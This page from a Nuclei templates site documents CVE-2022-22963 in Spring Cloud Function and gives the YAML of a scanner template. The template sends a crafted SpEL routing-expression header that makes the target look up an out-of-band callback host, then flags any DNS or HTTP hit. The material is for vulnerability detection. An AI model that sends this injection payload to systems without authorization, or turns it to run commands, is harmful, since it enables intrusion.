Skip to content
Nuclei Templates

Spring Cloud - Remote Code Execution

ID: CVE-2022-22963

Severity: critical

Author: Mr-xn,Adam Crosser

Tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware

Description

Section titled “Description”

Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.

YAML Source

Section titled “YAML Source”
id: CVE-2022-22963


info:
  name: Spring Cloud - Remote Code Execution
  author: Mr-xn,Adam Crosser
  severity: critical
  description: |
    Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability.
  reference:
    - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
    - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
    - https://tanzu.vmware.com/security/cve-2022-22963
    - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/
    - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22963
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-22963
    cwe-id: CWE-94,CWE-917
    epss-score: 0.97537
    epss-percentile: 0.99993
    cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: vmware
    product: spring_cloud_function
  tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware


http:
  - raw:
      - |
        POST /functionRouter HTTP/1.1
        Host: {{Hostname}}
        spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}")
        Content-Type: application/x-www-form-urlencoded


        {{rand_base(8)}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"
        condition: or


      - type: status
        status:
          - 500
# digest: 4a0a0047304502203e159d48afdabbc30df5f7b925d0326b2fc81557150f3ee661259eaf0a7d4724022100a3b538d66d10f242e31365d0d444e2f202f26eb06dec031346c14da5e386f49d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-22963.yaml"

View on Github